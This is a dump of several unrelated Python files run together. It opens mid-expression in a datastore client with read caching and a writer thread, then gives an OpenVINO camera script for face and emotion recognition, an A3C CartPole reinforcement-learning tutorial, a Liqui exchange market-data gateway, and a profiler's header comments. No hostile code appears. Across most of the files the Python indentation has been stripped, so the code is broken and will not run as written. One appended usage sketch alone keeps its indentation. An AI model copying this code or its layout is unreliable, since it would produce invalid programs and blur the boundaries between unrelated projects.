+ alias + ", " + str(recentry))
self._recordCount -= len(entries)
del self._recordBuffer[alias]
except OneException:
e = sys.exc_info()[1]
if e.message.find("datapoint") != -1:
log.exception(e.message)
self._recordCount -= len(entries)
del self._recordBuffer[alias]
else:
del self._recordBuffer[alias]
except OneException:
e = sys.exc_info()[1]
log.error(e.message)
continue
finally:
lock.release()
if self._killed and not self._recordBuffer:
self._forceterminate = True
# Read cache routines below
def __addCacheData(self, alias, count, forcequery=False):
if self.__isCacheFull():
self.__clearCache()
self._cache[alias] = dict()
data = self.__refreshData(alias, count, forcequery)
if data:
self._cacheCount += 1
return data
def __isExpired(self, alias):
try:
expire = self._config['read_cache_expire_time']
return int(time.time()) - self._cache[alias]['time'] > expire
except:
return True
def __isCacheFull(self):
return self._cacheCount >= self._config['read_cache_size']
def __clearCache(self):
self._cache.clear()
self._cache = dict()
self._cacheCount = 0
def __refreshData(self, alias, count, forcequery=False):
try:
time.sleep(1)
data = self.__read(alias,
count,
forcequery)
self._cache[alias]['data'] = data
self._cache[alias]['time'] = int(time.time())
return data
except OneException:
e = sys.exc_info()[1]
log.error(e.message)
except Exception:
e = sys.exc_info()[1]
log.exception("Unknown Exception While Refreshing Data")
return False
# Public methods below
def isThreadAlive(self):
return self._thread.isAlive()
def comment(self,
alias,
visibility,
commentstr):
rid = self.__lookup(alias)
if rid:
status, message = self._conn.comment(self._cik,
rid,
visibility,
commentstr)
if status:
return True
return False
def createDataport(self,
alias,
format,
name=None,
preprocess=[],
count=0,
duration=0,
visibility="public"):
rid = self.__lookup(alias)
if rid:
return False, "Alias already existed."
else:
if self.__createDataport(alias,
name,
format,
preprocess,
count,
duration,
visibility):
return True, True
else:
return False, "Failed to create Dataport."
def read(self, alias, count=1, forcequery=False):
if alias in self._cache: # has cache data
if self.__isExpired(alias) or count != len(self._cache[alias]['data']):
return self.__refreshData(alias, count, forcequery)
else:
return self._cache[alias]['data']
else: # no cache data
return self.__addCacheData(alias, count, forcequery)
def record(self, alias, entries):
if self.__isBufferFull() or not (self._auto or self.__lookup(alias)):
return False
lock.acquire()
try:
if not alias in self._recordBuffer:
self._recordBuffer[alias] = list()
for (t, value) in entries:
recentry = [t, value, False]
self._recordBuffer[alias].append(recentry)
finally:
lock.release()
def restart(self):
self.stop(force=True)
self.start()
def start(self, daemon=False):
time.sleep(1)
self._killed = False
self._forceterminate = False
self._thread = threading.Thread(target=self.__processJsonRPC)
self._thread.setDaemon(daemon)
self._thread.start()
def stop(self, force=False):
self._killed = True
self._forceterminate = force
def write(self, alias, value):
if self.__isBufferFull() or not (self._auto or self.__lookup(alias)):
return False
else:
lock.acquire()
try:
if alias in self._liveBuffer:
self._liveBuffer[alias] = value
msg = "Update the (alias,value) in buffer:%s,%s"
log.debug(msg % (alias, value))
return False
else:
self._liveBuffer[alias] = value
finally:
lock.release()
log.debug("Current buffer count: %s" % self.__bufferCount())
log.debug("Add to buffer:%s,%s" % (alias, value))
return True
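#==============================================================================
# Minimal usage sketch (not part of the original module): the CIK below is a
# placeholder, the alias 'temperature' is arbitrary, and the autocreate dict
# simply mirrors the keys consumed by the dataport auto-creation code above.
#==============================================================================
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    ds = Datastore(cik='PLACEHOLDER-CIK',      # hypothetical device key
                   interval=5,                 # flush the write buffer every 5 s
                   autocreate={'format': 'string',
                               'preprocess': [],
                               'count': 'infinity',
                               'duration': 'infinity',
                               'visibility': 'parent'})
    ds.start(daemon=True)            # spawns the background JSON RPC writer thread
    ds.write('temperature', 21.5)    # buffered live write
    time.sleep(6)                    # give the writer one interval to flush
    print(ds.read('temperature'))    # served from the read cache while still fresh
    ds.stop(force=True)              # terminate the writer thread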
|
main.py
|
##############################################
# sudo apt-get install -y python3-picamera
# sudo -H pip3 install imutils --upgrade
##############################################
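# Illustrative invocation (values match the argparse defaults below; the model
# paths are an assumption about where the OpenVINO FP16 IR files live):
#   python3 main.py -cm 0 -cn 0 -wd 640 -ht 480 -numncs 1 -vidfps 30 \
#       -fdmp ./FP16/face-detection-retail-0004 -emmp ./FP16/emotions-recognition-retail-0003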
import sys
import numpy as np
import cv2, io, time, argparse, re
from os import system
from os.path import isfile, join
from time import sleep
import multiprocessing as mp
try:
from armv7l.openvino.inference_engine import IENetwork, IEPlugin
except:
from openvino.inference_engine import IENetwork, IEPlugin
import heapq
import threading
try:
from imutils.video.pivideostream import PiVideoStream
from imutils.video.filevideostream import FileVideoStream
import imutils
except:
pass
lastresults = None
threads = []
processes = []
frameBuffer = None
results = None
fps = ""
detectfps = ""
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
cam = None
vs = None
window_name = ""
elapsedtime = 0.0
g_plugin = None
g_inferred_request = None
g_heap_request = None
g_inferred_cnt = 0
g_number_of_allocated_ncs = 0
LABELS = ["neutral", "happy", "sad", "surprise", "anger"]
COLORS = np.random.uniform(0, 255, size=(len(LABELS), 3))
def camThread(LABELS, resultsEm, frameBuffer, camera_width, camera_height, vidfps, number_of_camera, mode_of_camera):
global fps
global detectfps
global lastresults
global framecount
global detectframecount
global time1
global time2
global cam
global vs
global window_name
if mode_of_camera == 0:
cam = cv2.VideoCapture(number_of_camera)
if cam.isOpened() != True:
print("USB Camera Open Error!!!")
sys.exit(0)
cam.set(cv2.CAP_PROP_FPS, vidfps)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
window_name = "USB Camera"
else:
vs = PiVideoStream((camera_width, camera_height), vidfps).start()
sleep(3)
window_name = "PiCamera"
cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)
while True:
t1 = time.perf_counter()
# USB Camera Stream or PiCamera Stream Read
color_image = None
if mode_of_camera == 0:
s, color_image = cam.read()
if not s:
continue
else:
color_image = vs.read()
if frameBuffer.full():
frameBuffer.get()
frames = color_image
height = color_image.shape[0]
width = color_image.shape[1]
frameBuffer.put(color_image.copy())
res = None
if not resultsEm.empty():
res = resultsEm.get(False)
detectframecount += 1
imdraw = overlay_on_image(frames, res)
lastresults = res
else:
imdraw = overlay_on_image(frames, lastresults)
cv2.imshow(window_name, cv2.resize(imdraw, (width, height)))
if cv2.waitKey(1)&0xFF == ord('q'):
sys.exit(0)
## Print FPS
framecount += 1
if framecount >= 25:
fps = "(Playback) {:.1f} FPS".format(time1/25)
detectfps = "(Detection) {:.1f} FPS".format(detectframecount/time2)
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
time2 += elapsedTime
# l = Search list
# x = Search target value
def searchlist(l, x, notfoundvalue=-1):
if x in l:
return l.index(x)
else:
return notfoundvalue
def async_infer(ncsworkerFd, ncsworkerEm):
while True:
ncsworkerFd.predict_async()
ncsworkerEm.predict_async()
class BaseNcsWorker():
def __init__(self, devid, model_path, number_of_ncs):
global g_plugin
global g_inferred_request
global g_heap_request
global g_inferred_cnt
global g_number_of_allocated_ncs
self.devid = devid
if number_of_ncs == 0:
self.num_requests = 4
elif number_of_ncs == 1:
self.num_requests = 4
elif number_of_ncs == 2:
self.num_requests = 2
elif number_of_ncs >= 3:
self.num_requests = 1
print("g_number_of_allocated_ncs =", g_number_of_allocated_ncs, "number_of_ncs =", number_of_ncs)
if g_number_of_allocated_ncs < 1:
self.plugin = IEPlugin(device="MYRIAD")
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
g_plugin = self.plugin
g_inferred_request = self.inferred_request
g_heap_request = self.heap_request
g_inferred_cnt = self.inferred_cnt
g_number_of_allocated_ncs += 1
else:
self.plugin = g_plugin
self.inferred_request = g_inferred_request
self.heap_request = g_heap_request
self.inferred_cnt = g_inferred_cnt
self.model_xml = model_path + ".xml"
self.model_bin = model_path + ".bin"
self.net = IENetwork(model=self.model_xml, weights=self.model_bin)
self.input_blob = next(iter(self.net.inputs))
self.exec_net = self.plugin.load(network=self.net, num_requests=self.num_requests)
class NcsWorkerFd(BaseNcsWorker):
def __init__(self, devid, frameBuffer, resultsFd, model_path, number_of_ncs):
super().__init__(devid, model_path, number_of_ncs)
self.frameBuffer = frameBuffer
self.resultsFd = resultsFd
def image_preprocessing(self, color_image):
prepimg = cv2.resize(color_image, (300, 300))
prepimg = prepimg[np.newaxis, :, :, :]  # add a batch-size axis
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def predict_async(self):
try:
if self.frameBuffer.empty():
return
color_image = self.frameBuffer.get()
prepimg = self.image_preprocessing(color_image)
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1:
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
self.exec_net.requests[reqnum].wait(-1)
out = self.exec_net.requests[reqnum].outputs["detection_out"].flatten()
detection_list = []
face_image_list = []
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
if confidence > 0.3:
detection[3] = int(detection[3] * color_image.shape[1])
detection[4] = int(detection[4] * color_image.shape[0])
detection[5] = int(detection[5] * color_image.shape[1])
detection[6] = int(detection[6] * color_image.shape[0])
if (detection[6] - detection[4]) > 0 and (detection[5] - detection[3]) > 0:
detection_list.extend(detection)
face_image_list.extend([color_image[int(detection[4]):int(detection[6]), int(detection[3]):int(detection[5]), :]])
if len(detection_list) > 0:
self.resultsFd.put([detection_list, face_image_list])
self.inferred_request[reqnum] = 0
except:
import traceback
traceback.print_exc()
class NcsWorkerEm(BaseNcsWorker):
def __init__(self, devid, resultsFd, resultsEm, model_path, number_of_ncs):
super().__init__(devid, model_path, number_of_ncs)
self.resultsFd = resultsFd
self.resultsEm = resultsEm
def image_preprocessing(self, color_image):
try:
prepimg = cv2.resize(color_image, (64, 64))
except:
prepimg = np.full((64, 64, 3), 128)
prepimg = prepimg[np.newaxis, :, :, :]  # add a batch-size axis
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def predict_async(self):
try:
if self.resultsFd.empty():
return
resultFd = self.resultsFd.get()
detection_list = resultFd[0]
face_image_list = resultFd[1]
emotion_list = []
max_face_image_list_cnt = len(face_image_list)
image_idx = 0
end_cnt_processing = 0
heapflg = False
cnt = 0
dev = 0
if max_face_image_list_cnt <= 0:
detection_list.extend([""])
self.resultsEm.put([detection_list])
return
while True:
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1 and image_idx <= (max_face_image_list_cnt - 1) and len(face_image_list[image_idx]) > 0:
if len(face_image_list[image_idx]) == 0:
image_idx += 1
continue
else:
prepimg = self.image_preprocessing(face_image_list[image_idx])
image_idx += 1
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
heapq.heappush(self.heap_request, (self.inferred_cnt, reqnum))
heapflg = True
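# the heap stores (submission counter, request slot) pairs, so the oldest
# outstanding inference is polled first; if it is still running it is pushed
# back onto the heap and retried on the next pass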
if heapflg:
cnt, dev = heapq.heappop(self.heap_request)
heapflg = False
if self.exec_net.requests[dev].wait(0) == 0:
self.exec_net.requests[dev].wait(-1)
out = self.exec_net.requests[dev].outputs["prob_emotion"].flatten()
emotion = LABELS[int(np.argmax(out))]
detection_list.extend([emotion])
self.resultsEm.put([detection_list])
self.inferred_request[dev] = 0
end_cnt_processing += 1
if end_cnt_processing >= max_face_image_list_cnt:
break
else:
heapq.heappush(self.heap_request, (cnt, dev))
heapflg = True
except:
import traceback
traceback.print_exc()
def inferencer(resultsFd, resultsEm, frameBuffer, number_of_ncs, fd_model_path, em_model_path):
# Init infer threads
threads = []
for devid in range(number_of_ncs):
# Face Detection, Emotion Recognition start
thworker = threading.Thread(target=async_infer, args=(NcsWorkerFd(devid, frameBuffer, resultsFd, fd_model_path, number_of_ncs),
NcsWorkerEm(devid, resultsFd, resultsEm, em_model_path, 0),))
thworker.start()
threads.append(thworker)
print("Thread-"+str(devid))
for th in threads:
th.join()
def overlay_on_image(frames, object_infos):
try:
color_image = frames
if isinstance(object_infos, type(None)):
return color_image
# Show images
height = color_image.shape[0]
width = color_image.shape[1]
entire_pixel = height * width
img_cp = color_image.copy()
for object_info in object_infos:
if object_info[2] == 0.0:
break
if (not np.isfinite(object_info[0]) or
not np.isfinite(object_info[1]) or
not np.isfinite(object_info[2]) or
not np.isfinite(object_info[3]) or
not np.isfinite(object_info[4]) or
not np.isfinite(object_info[5]) or
not np.isfinite(object_info[6])):
continue
min_score_percent = 60
source_image_width = width
source_image_height = height
percentage = int(object_info[2] * 100)
if (percentage <= min_score_percent):
continue
box_left = int(object_info[3])
box_top = int(object_info[4])
box_right = int(object_info[5])
box_bottom = int(object_info[6])
emotion = str(object_info[7])
label_text = emotion + " (" + str(percentage) + "%)"
box_color = COLORS[searchlist(LABELS, emotion, 0)]
box_thickness = 2
cv2.rectangle(img_cp, (box_left, box_top), (box_right, box_bottom), box_color, box_thickness)
label_background_color = (125, 175, 75)
label_text_color = (255, 255, 255)
label_size = cv2.getTextSize(label_text, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)[0]
label_left = box_left
label_top = box_top - label_size[1]
if (label_top < 1):
label_top = 1
label_right = label_left + label_size[0]
label_bottom = label_top + label_size[1]
cv2.rectangle(img_cp, (label_left - 1, label_top - 1), (label_right + 1, label_bottom + 1), label_background_color, -1)
cv2.putText(img_cp, label_text, (label_left, label_bottom), cv2.FONT_HERSHEY_SIMPLEX, 0.5, label_text_color, 1)
cv2.putText(img_cp, fps, (width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.putText(img_cp, detectfps, (width-170,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
return img_cp
except:
import traceback
traceback.print_exc()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-cm','--modeofcamera',dest='mode_of_camera',type=int,default=0,help='Camera Mode. 0:=USB Camera, 1:=PiCamera (Default=0)')
parser.add_argument('-cn','--numberofcamera',dest='number_of_camera',type=int,default=0,help='USB camera number. (Default=0)')
parser.add_argument('-wd','--width',dest='camera_width',type=int,default=640,help='Width of the frames in the video stream. (Default=640)')
parser.add_argument('-ht','--height',dest='camera_height',type=int,default=480,help='Height of the frames in the video stream. (Default=480)')
parser.add_argument('-numncs','--numberofncs',dest='number_of_ncs',type=int,default=1,help='Number of NCS. (Default=1)')
parser.add_argument('-vidfps','--fpsofvideo',dest='fps_of_video',type=int,default=30,help='FPS of Video. (Default=30)')
parser.add_argument('-fdmp','--facedetectionmodelpath',dest='fd_model_path',default='./FP16/face-detection-retail-0004',help='Face Detection model path. (xml and bin. Except extension.)')
parser.add_argument('-emmp','--emotionrecognitionmodelpath',dest='em_model_path',default='./FP16/emotions-recognition-retail-0003',help='Emotion Recognition model path. (xml and bin. Except extension.)')
args = parser.parse_args()
mode_of_camera = args.mode_of_camera
number_of_camera = args.number_of_camera
camera_width = args.camera_width
camera_height = args.camera_height
number_of_ncs = args.number_of_ncs
vidfps = args.fps_of_video
fd_model_path = args.fd_model_path
em_model_path = args.em_model_path
try:
mp.set_start_method('forkserver')
frameBuffer = mp.Queue(10)
resultsFd = mp.Queue() # Face Detection Queue
resultsEm = mp.Queue() # Emotion Recognition Queue
# Start streaming
p = mp.Process(target=camThread,
args=(LABELS, resultsEm, frameBuffer, camera_width, camera_height, vidfps, number_of_camera, mode_of_camera),
daemon=True)
p.start()
processes.append(p)
# Start detection MultiStick
# Activation of inferencer
p = mp.Process(target=inferencer,
args=(resultsFd, resultsEm, frameBuffer, number_of_ncs, fd_model_path, em_model_path),
daemon=True)
p.start()
processes.append(p)
while True:
sleep(1)
except:
import traceback
traceback.print_exc()
finally:
for p in range(len(processes)):
processes[p].terminate()
print("\n\nFinished\n\n")
|
A3C_discrete_action.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'CartPole-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 1000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32), axis=1, keep_dims=True)
exp_v = log_prob * tf.stop_gradient(td)
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
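# a_loss negates the entropy-regularized, advantage-weighted log-likelihood,
# so minimizing it performs the usual policy-gradient ascent step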
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return a_prob, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
prob_weights = SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel())  # select an action w.r.t. the action probabilities
return action
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if done: r = -5
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
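# walk the rewards backwards to build bootstrapped discounted returns:
# G_t = r_t + GAMMA * G_{t+1}, seeded with v_s_ (0 at a terminal state,
# the critic's V(s_) otherwise)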
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
liqui.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from multiprocessing import Process
import time
class ExchGwApiLiqui(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.liqui.io/api/3/depth/{0}".format(
instmt.get_instmt_code())
@classmethod
def get_trades_link(cls, instmt):
return "https://api.liqui.io/api/3/trades/{0}?limit=20".format(
(instmt.get_instmt_code()))
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
raw = raw[instmt.instmt_code]
keys = list(raw.keys())
if (cls.get_bids_field_name() in keys and
cls.get_asks_field_name() in keys):
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
res = res[instmt.instmt_code]
for i in range(0, len(res)):
t = res[len(res) - 1 - i]
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwLiqui(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiLiqui(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Liqui'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get trades worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Process(target=partial(self.get_order_book_worker, instmt))
t2 = Process(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Liqui'
instmt_name = 'ETHBTC'
instmt_code = 'eth_btc'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwLiqui([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
functionprofiler.py
|
#!/usr/bin/env python
#
#
# TODO:
# - implement cProfile or yappi, or use threading.setProfile and sys.setProfile, or implement one's own multi-threaded profiler:
# http://code.google.com/p/yappi/
# http://code.activestate.com/recipes/465831-profiling-threads/
# http://effbot.org/librarybook/sys.htm
#
#
# CHANGELOG:
# 2014-08-18 - v0.5.1 - lrq3000
# * force refresh (flush) stdout after printing
# * fixed runsnakerun
# 2012-11-12 - v0.5.0 - lrq3000
# * cleaned the functions a bit and added a no timeout mode
# 2010-09-22 - v0.4.3 - lrq3000
# * added error handling if profile and pstats libraries can't be found
